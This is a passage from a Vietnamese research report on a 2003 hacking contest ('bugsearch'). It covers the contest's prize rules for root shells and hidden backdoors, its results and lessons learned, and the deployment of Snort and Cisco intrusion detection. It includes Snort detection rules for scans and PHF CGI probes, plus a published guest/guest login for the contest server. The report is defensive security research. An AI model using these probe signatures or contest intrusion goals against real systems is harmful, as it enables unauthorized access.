8/ Tất cả các giải thưởng không bị các hacker lấy sẽ trao cho nhóm chuyên viên tổ chức
bảo vệ máy chủ.
9/ Trong trường hợp xảy ra tranh chấp, kết luận của Ban tổ chức giải sẽ là kết luận cuối
cùng.
Danh sách các giải thưởng:
• 1 giải trị giá 500 000 (năm trăm ngàn) đồng cho ai chiếm được shell quyền một
user thông thường trên máy chủ.
• 1 giải trị giá 1 (một) triệu đồng cho ai thay được nội dung trang chủ của
Webserver này. Redirect truy cập web của một số client qua máy webserver khác
không nằm trong phạm vi cuộc thi.
• 1 giải trị giá 1 (một) triệu cho ai thay đổi được nội dung tập tin /etc/shadow,
nhưng chưa có root shell
• 1 giải trị giá 1,5 (một phẩy năm) triệu đồng cho ai kiếm được shell quyền root
• 1 giải trị giá 2 (hai) triệu đồng cho hacker cài được backdoor dạng Load Kernel
Module trên máy chủ
• 1 giải đặc biệt trị giá 5 (năm) triệu đồng dành cho người cài được backdoor dạng
bất kỳ mà nhóm quản trị không phát hiện được ra. Hai ngày trước khi tổ chức hội
thảo, nhóm quản trị sẽ cắt server khỏi mạng và thực hiện kiểm tra tòan hệ thống.
Vào ngày trao giải, nhóm quản trị sẽ công bố các backdoor hiện đang có trong hệ
thống. Giải đặc biệt sẽ trao cho người có backdoor không trong danh sách
backdoor mà nhóm quản trị công bố và vẫn đang họat động. Demo sự tồn tại của
backdoor sẽ được thực hiện ngay tại hội thảo. Nếu có nhiều người thực hiện được
điều này thì giải sẽ được chia đều cho mọi người cùng đạt kết quả trên. Các
hacker được quyền thực hiện các kỹ thuật để mình trở thành người duy nhất có
backdoor mà quản trị mạng không phát hiện được.
Upload by Kenhdaihoc.com
Đề tài khoa học Hỗ trợ bảo mật các hệ thống tin học Việt nam
45
MỘT SỐ THAY ĐỔI ĐỐI VỚI
THỂ LỆ NỘP BÀI THI TÌM SƠ HỞ “BUGSEARCH”
Thân chào các bạn,
Nhận được một số phản ánh của một số bạn yêu thích tìm hiểu về bảo mật hệ thống, Ban
tổ chức cuộc thi bugsearch xin có một số thay đổi “thoáng hơn” về phương thức nộp bài
thi như sau:
1/ Để nộp bài thi, các bạn gửi về ban tổ chức theo địa chỉ bugsearch@hcm.vnn.vn bằng
chứng cho phép chứng tỏ việc xâm nhập thành công của các bạn. Hình thức trình bày
bằng chứng này hòan tòan theo ý của các bạn và chỉ cần đủ rõ để Ban tổ chức có thể xác
định được kết quả,
2/ Các bạn cần cho biết địa chỉ Email để Ban tổ chức có thể gửi Email xác nhận kết quả
của bạn và gửi thư mời bạn tới nhận giải. Địa chỉ Email có thể là phương thức duy nhất
cho phép Ban tổ chức liên hệ tới các bạn nếu các bạn muốn,
3/ Các bạn có thể ủy quyền cho người khác nhận giải hoặc đề nghị phương án chuyển
giải thưởng tới tay các bạn,
Để tạo điều kiện cho nhiều người tham gia, chúng tôi sẽ gia hạn cuộc thi tới 18h00 ngày
22/10/2003.
Chúc các bạn một cuộc thi hào hứng và thành công,
Nhóm bugsearch
“VỀ ĐÍCH”
TÌM SƠ HỞ “BUGSEARCH”
Thân chào các bạn,
Chúng tôi đã nhận được một số emailcủa các bạn tham gia cuộc thi bugsearch thông báo
về sơ hở dẫn đến cơ sở dữ liệu các tài khoản đăng ký trong bugsearch bị thay đổi. Danh
sách các bạn tìm được sơ hở này là :
Tên/nickname Email address Thời gian
Quang Huy Date: Thu, 16 Oct 2003 00:21:46 -0700
(PDT)
!!! Yeu Tram !!! Thu, 16 Oct 2003 01:48:37 -0700 (PDT)
"::: PTV5 Website
:::"
Date: Thu, 16 Oct 2003 20:38:39 -0700
(PDT)
Huynh Quoc
Khanh"
<huynh.quoc.khanh@quantic.com.vn
>
Date: Sat, 18 Oct 2003 10:13:56 +0700
Tuy đây chưa phải là trang chủ bị thay đổi, nhưng chúng tôi công nhận là các bạn đã có
khả năng thay đổi một nội dung quan trọng của Website bugsearch và bạn Quang Huy là
người đoạt giải thay đổi nội dung Website trị giá 1 (một) triệu đồng. Nhắc lại theo thể lệ
Upload by Kenhdaihoc.com
Đề tài khoa học Hỗ trợ bảo mật các hệ thống tin học Việt nam
46
cuộc thi, nếu Quang Huy xâm nhập được sâu hơn vào hệ thống thì giải này sẽ dành cho
người thứ hai và v.v.
Để xem xét khả năng chống lại mất hòan tòan quyền kiểm soát máy bugsearch nếu hệ
thống bị lộ mật khẩu của một tài khỏan, chúng tôi xin công bố một tài khỏan guest với
password guest trên máy bugsearch. Các bạn có thể sử dụng tài khỏan này để kết nối vào
bugsearch qua ssh và xem xét khả năng lấy root shell, cài Load Kernel Module, cài
backdoor lên bugsearch.
Thời gian không còn nhiều (cuộc thi được gia hạn tới 18h00 ngày 22/10/2003), hãy cố
gắng “Về đích” trong cuộc thi bugsearch này.
Chúc các bạn thành công,
Nhóm bugsearch
Upload by Kenhdaihoc.com
Đề tài khoa học Hỗ trợ bảo mật các hệ thống tin học Việt nam
47
Diễn biến của cuộc thi bugsearch lần tiếp theo như phản ánh thông qua 3 thông
báo của bugsearch.
• Ngày 26/9/2003 vào lúc 12h00, cuộc thi được nối lại. Máy bugsearch kết
nối vào mạng
• Ngày 13/10/2003, được biết một số bạn ngại lộ danh tánh nên chưa tích
cực tham gia cuộc thi, chúng tôi đã thay đổi thể lệ nộp bài để cho phép
các bạn có thể đang ký kết quả với nickname và email address. Trên thực
tế, chúng tôi nhận thấy các bạn tham gia cuộc thi đã không ngần ngại
thông báo kết quả cũng như danh tánh của mình khi tấn công thành công.
Đồng thời cuộc thi được chính thức gia hạn thêm tới 22/10/2003.
• Ngày 18/10/2003 vào lúc 16h00, nhóm đề tài quyết định “mạo hiểm” hơn
bằng cách mở một tài khỏan guest với mật khẩu guest cho tất cả mọi
người. Thông tin này được chúng tôi thông báo tới một số bạn cụ thể,
thông tin trên các diễn đàn của hacker Việtnam, thông báo bởi echip. Việc
mạo hiểm này là nhằm thử thách khả năng chống lại việc mất quyền root
của bugsearch, trong trường hợp một dịch vụ với quyền hạn chế bị xâm
nhập và hacker có được shell cùng quyền của người sử dụng hệ thống.
• Tới đúng 18h00 nhóm dự án chấm dứt cuộc thi, cắt server ra khỏi mạng
và tiến hành thống kê kết quả, tìm các backdoor có thể
• Vào lúc 18h00 ngày 24/10/2003, trước sự chứng kiến của phóng viên
tuần báo echip, nhóm dự án tiến hành niêm phong ổ đĩa cứng của
bugsearch nhằm bảo đảm việc tìm kiếm các backdoor sau này, nếu có, tại
hội thảo về bảo mật hệ thống.
• Ngọai trừ giải đặc biệt cho người cài được backdoor mà quản trị mạng
không biết chưa được xác định, hiện nay nhóm quản trị đã công nhận 1
giải thuộc về bạn Quang Huy (tự Huyremy), người đầu tiên trong 4 người
đã phát hiện sơ hở của chương trình cập nhật danh sách người đăng ký
vào web bugsearch và có khả năng thay đổi cơ sở dữ liệu người đang ký
của bugsearch.
Qua cuộc thi bugsearch chúng tôi rút ra những bài học kinh nghiệm sau:
• Thi hacking là một hình thức tốt cho phép chúng ta đánh giá được trình
độ, sở trường của các hacker tại một thời điểm. Ví dụ như tại thời điểm
của cuộc thi, phần khai thác lỗi lập trình ứng dụng chạy trên server của
các hacker là mạnh nhất.
• Tổ chức cuộc thi là hình thức cho phép thử thách một cấu hình tốt nhất.
Căn cứ trên những thành công xâm nhập cùng với các nhật ký của các hệ
thống phát hiện xâm nhập (IDS), chúng ta có thể xác định được mức độ
an tòan của một hệ thống nếu chúng ta triển khai.
• IDS là một thành phần quan trọng của một hệ thống . Không có IDS khó
mà có thể phát hiện sớm, lượng giá được mức độ “quan tâm” của
cracker/hacker đối với hệ thống của chúng ta. Từ đó khó mà có được một
quan tâm, đầu tư đúng với nhu cầu thực.
Upload by Kenhdaihoc.com
Đề tài khoa học Hỗ trợ bảo mật các hệ thống tin học Việt nam
48
• Kinh nghiệm cán bộ đối với việc phân tích các log của IDS là rất quan
trọng. Các thông báo về tấn công của IDS nhiều khi không sát với thực tế.
Ví dụ như các phêin làm việc nhằm thay đổi cơ sở dữ liệu của Web
bugsearch được các hệ thống báo động ở cấp trung bình, thậm trí thấp.
• Tổ chức thi hacking một cách bài bản với một web site hấp dẫn là một
việc làm tốn kém và vượt quá khả năng của một đơn vị/công ty. Đó là
những khó khăn về chuyên môn (phải có đủ chuyên gia ở các lĩnh vực
mạng, hệ điều hành, cơ sở dữ liệu, lập trình, lập trình Internet …); khó
khăn về tài chính (đường truyền riêng, thiết bị, chi phí giải thưởng..); khó
khăn về nhân lực tổ chức theo dõi và khó khăn về thông tin. Do đó, nếu
chúng ta muốn có những cuộc thi hacking trong tương lai thì đó phải là sự
phối hợp của nhiều đơn vị, công ty và đặc biệt là các nhà cung cấp dịch
vụ Internet chuyên nghiệp.
Chúng tôi hy vọng rằng cuộc thi bugsearch chỉ là mở đầu cho những cuộc
thi/nghiên cứu về bảo mật hệ thống sau này. Đó là một cách làm hiệu quả
nhằm nâng cao khả năng bảo vệ của các mạng tin học của chúng ta.
4.6 Hệ thống phát hiện xâm nhập snort trên Linux
4.6.1 GIỚI THIỆU VỀ SNORT
Snort là công cụ phát hiện xâm nhập khá phổ biến và được gọi là light-weight
Instrution Detection System, với một số đặc tính sau:
Hỗ trợ nhiều platform: Linux, OpenBSD, FreeBSD, Solaris, Windows,…
I386 Sparc M68k/PPC Alpha Other
X X X X X Linux
X X X OpenBSD
X X FreeBSD
X X NetBSD
X X Solaris
X SunOS 4.1.X
X HP-UX
X AIX
X IRIX
X Tru64
X MacOS X Server
X Win32 - (Win9x/NT/2000)
- Kích thước tương nhỏ: phiên bản hiện tại 2.0.2 có kích thước 1885220 Bytes.
Upload by Kenhdaihoc.com
Đề tài khoa học Hỗ trợ bảo mật các hệ thống tin học Việt nam
49
- Có khả năng phát hiện một số lượng lớn các kiểu thăm dò, xâm nhập khác
nhau như : buffer overflow, CGI-attack, dò tìm hệ điều hành, ICMP, virus,…
- Phát hiện nhanh các xâm nhập theo thời gian thực.
- Cung cấp cho nhà quản trị các thông tin cần thiết để xử lý các sự cố khi bị
xâm nhập
- Giúp người quản trị tự đặt ra các dấu hiệu xâm nhập mới một cách dễ dàng.
- Là phần mềm Open Source và không tốn kém chi phí đầu tư.
4.6.2 CƠ SỞ THIẾT KẾ SNORT
Snort được xây dựng với mục đích thoả mãn các tính năng cơ bản sau: Có hiệu
năng cao, đơn giản và có tính uyển chuyển cao.
Ba thành phần chính của Snort gồm có: hệ thống packet decoder, hệ thống
detection engine và hệ thống logging & alerting. Ba thành phần này dựa trên cơ
sở của thư viện LIBPCAP, là thư viện cung cấp khả năng lắng nghe và lọc
packet trên mạng.
Hệ thống Packet decoder:
Nhiệm vụ chủ yếu của hệ thống này là phân tích gói dữ liệu thô bắt được trên
mạng và phục hồi thành gói dữ liệu hoàn chỉnh ở lớp application, làm input cho
hệ thống dectection engine.
Quá trình phục hồi gói dữ liệu được tiến hành từ lớp datalink cho tới lớp
application theo thứ tự của protocol stack. Vấn đề quan trọng đặt ra cho hệ
thống này đó là tốc độ xử lý gói dữ liệu, nếu tốc độ xử lý chậm sẽ làm cho hiệu
năng của SNORT giảm sút do “nghe sót”.
Hệ thống detection engine
SNORT dùng các rules để phát hiện ra các xâm nhập trên mạng. Xem rules sau:
alert tcp !172.16.1.0/24 any -> any any (flags: SF; msg: “SYN-FIN Scan”;)
Một rules có hai thành phần: Header và Option,
Header:
alert tcp !172.16.1.0/24 any -> any any
Option:
(flags: SF; msg: “SYN-FIN Scan”;)
Mỗi dấu hiệu xâm nhập sẽ được thể hiện bằng một rule. Vậy SNORT quản lý tập
các rules như thế nào ?
SNORT dùng cấu trúc dữ liệu sau để quản lý các rules gọi là Chain Headers và
Chain Options. Cấu trúc dữ liệu này bao gồm một dãy các Header và mỗi
Header sẽ liên kết đến dãy các Option., sở dĩ dưa trên các Header là vì đây là
Upload by Kenhdaihoc.com
Đề tài khoa học Hỗ trợ bảo mật các hệ thống tin học Việt nam
50
thành phần ít thay đổi của những rules được viết cho cùng một kiểu phát hiện
xâm nhập và Option là thành phần dễ được sửa đổi nhất.
Ví dụ ta có 40 rules được viết cho kiểu thăm dò CGI-BIN, thực chất các rules này
có chung IP source, IP đích, port source, port đích, tức là có chung Header.
Mỗi packet sẽ được so trùng lần lượt trong các dãy cho đến khi tìm thấy mẫu
đầu tiên thì hành động tương ứng sẽ được thực hiện.
Hệ thống Logging & alerting
Dùng để thông báo cho quản trị mạng và ghi nhận lại các hành động xâm nhập
hệ thống. Hiện tại có 3 dạng logging và 5 kiểu alerting.
Các dạng logging, được chọn khi chạy SNORT
- Dạng decoded: Đây là dạng log thô nhất, cho phép thực hiện nhanh và thích
hợp với các chuyên gia
- Dạng nhị phân tcpdump: theo dạng tương tự như tcpdump và ghi vào đĩa
nhanh chóng, thích hợp với những hệ thống đòi hỏi performance cao.
- Dạng cây thư mục IP: Sắp sếp hệ thống log theo cấu trúc cây thư mục IP, dễ
hiểu đối với người dùng.
Các dạng alerting:
Chain Option
Content
TCP Flags
ICMP Codes/types
Payload Size
Chain Option
Content
TCP Flags
ICMP Codes/types
Payload Size
Chain Option
Content
TCP Flags
ICMP Codes/types
Payload Size
Chain Option
Content
TCP Flags
ICMP Codes/types
Payload Size
Chain Option
Content
TCP Flags
ICMP Codes/types
Payload Size
Chain Header
Source IP Address
Destination IP
Address
Source Port
Destination Port
Chain Header
Source IP Address
Destination IP
Address
Source Port
Destination Port
Chain Header
Source IP Address
Destination IP
Address
Source Port
Destination Port
Upload by Kenhdaihoc.com
Đề tài khoa học Hỗ trợ bảo mật các hệ thống tin học Việt nam
51
- ghi alert vào syslog
- ghi alert vào trong file text
- gửi thông điệp Winpopup dùng chương trình smbclient
- full alert: ghi lại thông điệp alert cùng với nội dung gói dữ liệu.
- fast alert: chỉ ghi nhận lại header của gói dữ liệu.Cách này thường dùng trong
các hệ thống cần performance cao.
TẬP LUẬT(RULES)
Tập luật của Snort đơn giản để ta hiểu và viết nhưng cũng đủ mạnh để có thể
phát hiện tất cả các hành động xâm nhập trên mạng.
Có 3 hành động chính được SNORT thực hiện khi so trùng 1 packet với các mẫu
trong rules:
- pass: loại bỏ packet mà SNORT bắt được
- log: tuỳ theo dạng logging được chọn mà packet sẽ được ghi nhận theo
dạng đó
- alert: sinh ra một alert tùy theo dạng alert được chọn và log toàn bộ
packet dùng dạng logging đã chọn.
Dạng cơ bản nhất của một rule bao gồm protocol, chiều của gói dữ liệu và port
cần quan tâm, không cần đến phần Option:
log tcp any any -> 172.16.1.0/24 80
Rule này sẽ log tất cả các gói dữ liệu đi vào mạng 172.16.1.0/24 ở port 80
Một rule khác có chứa Option
alert tcp any any -> 172.16.1.0/24 80 (content: "/cgi-bin/phf"; msg:
"PHF probe!";)
Rule này sẽ phát hiện các truy cập vào dịch vụ PHF trên web server và alert sẽ
được tạo ra cùng với việc ghi nhận lại toàn bộ gói dữ liệu.
Vùng địa chỉ IP trong các rules được viết dưới dạng CIDR block netmask, các
port có thể được xác định riêng lẻ hoặc theo vùng, port bắt đầu và port kết thúc
được ngăn cách bởi dấu “:”
alert tcp any any -> 172.16.1.0/24 6000:6010 (msg: "X traffic";)
Các option phổ biến của SNORT:
1. content: Search the packet payload for the a specified pattern.
2. flags: Test the TCP flags for specified settings.
3. ttl: Check the IP header's time-to-live (TTL) field.
4. itype: Match on the ICMP type field.
5. icode: Match on the ICMP code field.
6. minfrag: Set the threshold value for IP fragment size.
Upload by Kenhdaihoc.com
Đề tài khoa học Hỗ trợ bảo mật các hệ thống tin học Việt nam
52
7. id: Test the IP header for the specified value.
8. ack: Look for a specific TCP header acknowledgement number.
9. seq: Log for a specific TCP header sequence number.
10. logto: Log packets matching the rule to the specified filename.
11. dsize: Match on the size of the packet payload.
12. offset: Modifier for the content option, sets the offset into the packet payload
to begin the content search.
13. depth: Modifier for the content option, sets the number of bytes from the start
position to search through.
14. msg: Sets the message to be sent when a packet generates an event.
THAM KHẢO
SNORT có thể chạy tốt trên các platform mà LIBPCAP hổ trợ.
Phiên bản mới nhật hiện nay: Snort 2.02
Các thông tin thêm về SNORT có thể tham khảo tại website:
Mã nguồn SNORT có thể download tại:
Maillink list:
Thư viện libpcap:
4.6.3 KẾT QUẢ MÀ SNORT GHI NHẬN ĐƯỢC TRONG CUỘC THI
BUGSEARCH
Tổng số tấn công ghi nhận từ 54 địa chỉ IP khác nhau. Ghi nhận của snort ít hơn
các hệ thống IDS là do triển khai snort bi trục trặc kỹ thuật và muộn hơn các IDS
khác trong quá trình thi.
Cài đặt phần mềm snort 2.02 trên RedHat Linux 7.1 và kết quả chi tiết mà
snort ghi nhận được trình bày ở phụ lục D.
4.7 Triển khai thử nghiệm Cisco IDS cùng một số nhận định
4.7.1 Giới thiệu về Cisco IDS:
IDS – Intrusion Detection System – là hệ thống phát hiện sự xâm nhập. IDS gồm
có nhiều hệ thống khác nhau, cả hardware và software, chạy được trên các hệ
điều hành khác nhau như Unix, Linux, Windows...
Cisco IDS là một hệ thống IDS dựa trên nền network (chỉ có tác dụng đối với dữ
liệu luân chuyển trên network) do Cisco phát triển. Nguyên lý hoạt động là so
sánh dữ liệu thu nhận được với database của hệ thống để phát ra các cảnh báo
về sự xâm nhập. Hệ thống bao gồm 2 phần:
Upload by Kenhdaihoc.com
Đề tài khoa học Hỗ trợ bảo mật các hệ thống tin học Việt nam
53
- Sensor platform: là hardware dùng để theo dõi các packets truyền qua
mạng theo thời gian thực
- Director platform: là software dùng để config, log, và hiển thị các cảnh
báo do sensor báo về.
Khi phát hiện được sự xâm nhập, Cisco IDS có khả năng:
- TCP reset: kill kết nối TCP hiện đang kết nối tới attacker bằng cách gởi
TCP reset packet (chỉ có tác dụng với các kết nối TCP, còn UDP
không ảnh hưởng)
- IP blocking: IDS cập nhật Access Control List trên Router để từ chối tất
cả các kết nối đến từ IP của attacker.
- IP logging: lưu tất cả IP của attacker vào file log, đây là cách làm thụ
động, không ngăn được hacker tiếp tục tấn công hệ thống.
Cisco IDS là dòng sản phẩm dẫn đầu trên thị trường về giải pháp theo dõi bảo
mật hệ thống.
Đây là hệ thống được thiết kế để đáp ứng các yêu cầu ngày càng tăng của công
tác bảo mật, bảo vệ hệ thống khỏi các cuộc tấn công từ chối dịch vụ (DoS), phát
hiện sự xâm nhập hệ thống, chống lại sự tấn công của các loại sâu (như Code
Red và Nimda), cũng như bảo vệ các doanh nghiệp có ứng dụng thương mại
điện tử (e-commerce).
Hệ thống Cisco IDS triển khai trong cuộc thi bugsearch là Cisco IDS 4210, có
cấu hình: CPU Celeron 566MHz, 256MB Ram, OS Unix.
Việc sử dụng hệ thống Cisco IDS có lợi hơn so với các hệ thống khác vì các lý
do sau:
- Database dùng để nhận dạng các cuộc tấn công thường xuyên được
Cisco cập nhật
- Sản phẩm có độ ổn định cao.
- Dễ triển khai.
Tuy nhiên, việc sử dụng Cisco IDS có bất lợi là giá thành cao, các phần mềm
điều khiển đòi hỏi phải mua bản quyền.
4.7.2 Cách thức triển khai Cisco IDS trong cuộc thi
bugsearch:
IDS được đặt sau router 26xx, kết nối vào cùng hub với server đích. (theo như
sơ đồ)
IDS được cấu hình với dịch vụ lắng nghe các gói tin truyền đến IDS.
Dùng phần mềm IDS Event Viewer để phân loại kết quả đạt được.
Chi tiết việc cài đặt bằng lệnh gì, hình minh họa ta có thể xem ở đây:
Tóm lại, việc cài đặt IDS có thể rút gọn theo các bước đơn giản như sau:
Upload by Kenhdaihoc.com
Đề tài khoa học Hỗ trợ bảo mật các hệ thống tin học Việt nam
54
- Cấu hình IDS: nối monitor, keyboard, mouse vào Cisco IDS sensor để đặt IP
cho IDS sensor. Sau đó ta có thể telnet đến IDS sensor thông qua interface
int1 (dùng để command và control), hoặc ta có thể vào địa chỉ
https://IDS_IP_add để config IDS sensor qua web
- Nối IDS vào mạng: trên IDS có 2 interface RJ45: int0 dùng để quan sát tất cả
dữ liệu được truyền qua mạng, int1 dùng để điều khiển và cấu hình IDS. Ta
nối dây dẫn từ hub (nối đến máy chủ cần được bảo vệ) đến int0. Cần nhớ
phải dùng hub để dữ liệu có thể truyền đến IDS sensor, không được dùng
switch. Sau đó nối int1 đến máy ta dùng để điều khiển IDS sensor.
- Theo dõi các cuộc tấn công: Cisco IDS được cung cấp kèm theo phần mềm
Cis
Các file đính kèm theo tài liệu này:
- Báo cáo tổng quan đề tài hổ trợ bảo mật mạng tin học Việt Nam.pdf